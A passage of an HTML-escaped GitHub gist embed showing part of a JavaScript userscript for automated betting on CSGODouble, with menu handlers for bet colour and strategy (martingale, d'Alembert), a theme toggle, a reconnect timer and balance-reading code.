id=\"file-csgodouble-automatic-betting-bot-LC284\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.red.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L285\" class=\"blob-num js-line-number\" data-line-number=\"285\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC285\" class=\"blob-code blob-code-inner js-file-line\"> self.color = &#39;black&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L286\" class=\"blob-num js-line-number\" data-line-number=\"286\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC286\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current mode: black&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L287\" class=\"blob-num js-line-number\" data-line-number=\"287\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC287\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L288\" class=\"blob-num js-line-number\" data-line-number=\"288\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC288\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L289\" class=\"blob-num js-line-number\" data-line-number=\"289\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC289\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.red.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L290\" class=\"blob-num js-line-number\" data-line-number=\"290\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC290\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.rainbow.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L291\" class=\"blob-num js-line-number\" data-line-number=\"291\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC291\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.black.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L292\" class=\"blob-num js-line-number\" data-line-number=\"292\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC292\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.red.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L293\" class=\"blob-num js-line-number\" data-line-number=\"293\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC293\" class=\"blob-code blob-code-inner js-file-line\"> self.color = &#39;red&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L294\" class=\"blob-num js-line-number\" data-line-number=\"294\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC294\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current mode: red&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L295\" class=\"blob-num js-line-number\" data-line-number=\"295\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC295\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L296\" class=\"blob-num js-line-number\" data-line-number=\"296\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC296\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L297\" class=\"blob-num js-line-number\" data-line-number=\"297\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC297\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.rainbow.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L298\" class=\"blob-num js-line-number\" data-line-number=\"298\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC298\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.rainbow.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L299\" class=\"blob-num js-line-number\" data-line-number=\"299\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC299\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.black.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L300\" class=\"blob-num js-line-number\" data-line-number=\"300\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC300\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.red.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L301\" class=\"blob-num js-line-number\" data-line-number=\"301\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC301\" class=\"blob-code blob-code-inner js-file-line\"> self.color = &#39;rainbow&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L302\" class=\"blob-num js-line-number\" data-line-number=\"302\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC302\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current mode: rainbow&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L303\" class=\"blob-num js-line-number\" data-line-number=\"303\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC303\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L304\" class=\"blob-num js-line-number\" data-line-number=\"304\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC304\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L305\" class=\"blob-num js-line-number\" data-line-number=\"305\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC305\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.martingale.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L306\" class=\"blob-num js-line-number\" data-line-number=\"306\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC306\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.martingale.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L307\" class=\"blob-num js-line-number\" data-line-number=\"307\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC307\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.greatmartingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L308\" class=\"blob-num js-line-number\" data-line-number=\"308\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC308\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.betgreen.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L309\" class=\"blob-num js-line-number\" data-line-number=\"309\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC309\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.dalembert.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L310\" class=\"blob-num js-line-number\" data-line-number=\"310\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC310\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0; i &lt; self.menu.hideongreen.length; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L311\" class=\"blob-num js-line-number\" data-line-number=\"311\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC311\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.hideongreen[i].style.display = &#39;block&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L312\" class=\"blob-num js-line-number\" data-line-number=\"312\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC312\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L313\" class=\"blob-num js-line-number\" data-line-number=\"313\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC313\" class=\"blob-code blob-code-inner js-file-line\"> self.method = &#39;martingale&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L314\" class=\"blob-num js-line-number\" data-line-number=\"314\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC314\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current method: Martingale&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L315\" class=\"blob-num js-line-number\" data-line-number=\"315\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC315\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L316\" class=\"blob-num js-line-number\" data-line-number=\"316\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC316\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L317\" class=\"blob-num js-line-number\" data-line-number=\"317\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC317\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.greatmartingale.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L318\" class=\"blob-num js-line-number\" data-line-number=\"318\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC318\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.martingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L319\" class=\"blob-num js-line-number\" data-line-number=\"319\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC319\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.greatmartingale.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L320\" class=\"blob-num js-line-number\" data-line-number=\"320\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC320\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.betgreen.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L321\" class=\"blob-num js-line-number\" data-line-number=\"321\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC321\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.dalembert.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L322\" class=\"blob-num js-line-number\" data-line-number=\"322\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC322\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0; i &lt; self.menu.hideongreen.length; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L323\" class=\"blob-num js-line-number\" data-line-number=\"323\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC323\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.hideongreen[i].style.display = &#39;block&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L324\" class=\"blob-num js-line-number\" data-line-number=\"324\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC324\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L325\" class=\"blob-num js-line-number\" data-line-number=\"325\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC325\" class=\"blob-code blob-code-inner js-file-line\"> self.method = &#39;great martingale&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L326\" class=\"blob-num js-line-number\" data-line-number=\"326\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC326\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current method: Great martingale&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L327\" class=\"blob-num js-line-number\" data-line-number=\"327\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC327\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L328\" class=\"blob-num js-line-number\" data-line-number=\"328\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC328\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L329\" class=\"blob-num js-line-number\" data-line-number=\"329\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC329\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.dalembert.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L330\" class=\"blob-num js-line-number\" data-line-number=\"330\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC330\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.martingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L331\" class=\"blob-num js-line-number\" data-line-number=\"331\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC331\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.greatmartingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L332\" class=\"blob-num js-line-number\" data-line-number=\"332\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC332\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.betgreen.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L333\" class=\"blob-num js-line-number\" data-line-number=\"333\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC333\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.dalembert.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L334\" class=\"blob-num js-line-number\" data-line-number=\"334\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC334\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0; i &lt; self.menu.hideongreen.length; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L335\" class=\"blob-num js-line-number\" data-line-number=\"335\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC335\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.hideongreen[i].style.display = &#39;block&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L336\" class=\"blob-num js-line-number\" data-line-number=\"336\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC336\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L337\" class=\"blob-num js-line-number\" data-line-number=\"337\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC337\" class=\"blob-code blob-code-inner js-file-line\"> self.method = &#39;dalembert&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L338\" class=\"blob-num js-line-number\" data-line-number=\"338\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC338\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current method: D\\&#39;alembert&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L339\" class=\"blob-num js-line-number\" data-line-number=\"339\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC339\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L340\" class=\"blob-num js-line-number\" data-line-number=\"340\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC340\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L341\" class=\"blob-num js-line-number\" data-line-number=\"341\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC341\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.betgreen.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L342\" class=\"blob-num js-line-number\" data-line-number=\"342\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC342\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.martingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L343\" class=\"blob-num js-line-number\" data-line-number=\"343\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC343\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.greatmartingale.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L344\" class=\"blob-num js-line-number\" data-line-number=\"344\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC344\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.betgreen.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L345\" class=\"blob-num js-line-number\" data-line-number=\"345\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC345\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.dalembert.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L346\" class=\"blob-num js-line-number\" data-line-number=\"346\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC346\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0; i &lt; self.menu.hideongreen.length; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L347\" class=\"blob-num js-line-number\" data-line-number=\"347\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC347\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.hideongreen[i].style.display = &#39;none&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L348\" class=\"blob-num js-line-number\" data-line-number=\"348\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC348\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L349\" class=\"blob-num js-line-number\" data-line-number=\"349\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC349\" class=\"blob-code blob-code-inner js-file-line\"> self.method = &#39;green&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L350\" class=\"blob-num js-line-number\" data-line-number=\"350\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC350\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Current method: Bet green&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L351\" class=\"blob-num js-line-number\" data-line-number=\"351\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC351\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L352\" class=\"blob-num js-line-number\" data-line-number=\"352\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC352\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L353\" class=\"blob-num js-line-number\" data-line-number=\"353\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC353\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.theme.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L354\" class=\"blob-num js-line-number\" data-line-number=\"354\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC354\" class=\"blob-code blob-code-inner js-file-line\"> if (self.theme === &#39;dark&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L355\" class=\"blob-num js-line-number\" data-line-number=\"355\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC355\" class=\"blob-code blob-code-inner js-file-line\"> self.lightMode();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L356\" class=\"blob-num js-line-number\" data-line-number=\"356\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC356\" class=\"blob-code blob-code-inner js-file-line\"> self.theme = &#39;light&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L357\" class=\"blob-num js-line-number\" data-line-number=\"357\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC357\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Switching to light theme...&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L358\" class=\"blob-num js-line-number\" data-line-number=\"358\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC358\" class=\"blob-code blob-code-inner js-file-line\"> } else {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L359\" class=\"blob-num js-line-number\" data-line-number=\"359\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC359\" class=\"blob-code blob-code-inner js-file-line\"> self.darkMode();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L360\" class=\"blob-num js-line-number\" data-line-number=\"360\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC360\" class=\"blob-code blob-code-inner js-file-line\"> self.theme = &#39;dark&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L361\" class=\"blob-num js-line-number\" data-line-number=\"361\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC361\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Switching to dark theme...&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L362\" class=\"blob-num js-line-number\" data-line-number=\"362\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC362\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L363\" class=\"blob-num js-line-number\" data-line-number=\"363\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC363\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L364\" class=\"blob-num js-line-number\" data-line-number=\"364\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC364\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L365\" class=\"blob-num js-line-number\" data-line-number=\"365\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC365\" class=\"blob-code blob-code-inner js-file-line\"> setInterval(function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L366\" class=\"blob-num js-line-number\" data-line-number=\"366\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC366\" class=\"blob-code blob-code-inner js-file-line\"> if(!WS) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L367\" class=\"blob-num js-line-number\" data-line-number=\"367\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC367\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Reconnecting...&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L368\" class=\"blob-num js-line-number\" data-line-number=\"368\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC368\" class=\"blob-code blob-code-inner js-file-line\"> connect();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L369\" class=\"blob-num js-line-number\" data-line-number=\"369\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC369\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L370\" class=\"blob-num js-line-number\" data-line-number=\"370\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC370\" class=\"blob-code blob-code-inner js-file-line\"> }, 2500);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L371\" class=\"blob-num js-line-number\" data-line-number=\"371\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC371\" class=\"blob-code blob-code-inner js-file-line\">}<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L372\" class=\"blob-num js-line-number\" data-line-number=\"372\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC372\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L373\" class=\"blob-num js-line-number\" data-line-number=\"373\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC373\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.updateBalance = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L374\" class=\"blob-num js-line-number\" data-line-number=\"374\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC374\" class=\"blob-code blob-code-inner js-file-line\"> this.balance = parseInt(balance.textContent);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L375\" class=\"blob-num js-line-number\" data-line-number=\"375\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC375\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L376\" class=\"blob-num js-line-number\" data-line-number=\"376\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC376\" class=\"blob-code blob-code-inner js-file-line\"> if (isNaN(this.balance)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L377\" class=\"blob-num js-line-number\" data-line-number=\"377\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC377\" class=\"blob-code blob-code-inner js-file-line\"> this.log(&#39;Error getting current balance!&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L378\" class=\"blob-num js-line-number\" data-line-number=\"378\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC378\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L379\" class=\"blob-num js-line-number\" data-line-number=\"379\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC379\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L380\" class=\"blob-num js-line-number\" data-line-number=\"380\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC380\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L381\" class=\"blob-num js-line-number\" data-line-number=\"381\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC381\" class=\"blob-code blob-code-inner js-file-line\"> if (this.debug) { this.logdebug(&#39;Balance updated: &#39; + this.balance); }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L382\" class=\"blob-num js-line-number\" data-line-number=\"382\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC382\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L383\" class=\"blob-num js-line-number\" data-line-number=\"383\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC383\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L384\" class=\"blob-num js-line-number\" data-line-number=\"384\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC384\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L385\" class=\"blob-num js-line-number\" data-line-number=\"385\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC385\" class=\"blob-code blob-code-inner js-file-line\">Automated.prototype.updateHistory = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L386\" class=\"blob-num js-line-number\" data-line-number=\"386\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC386\" class=\"blob-code blob-code-inner js-file-line\"> var self = this;<\/td>\n 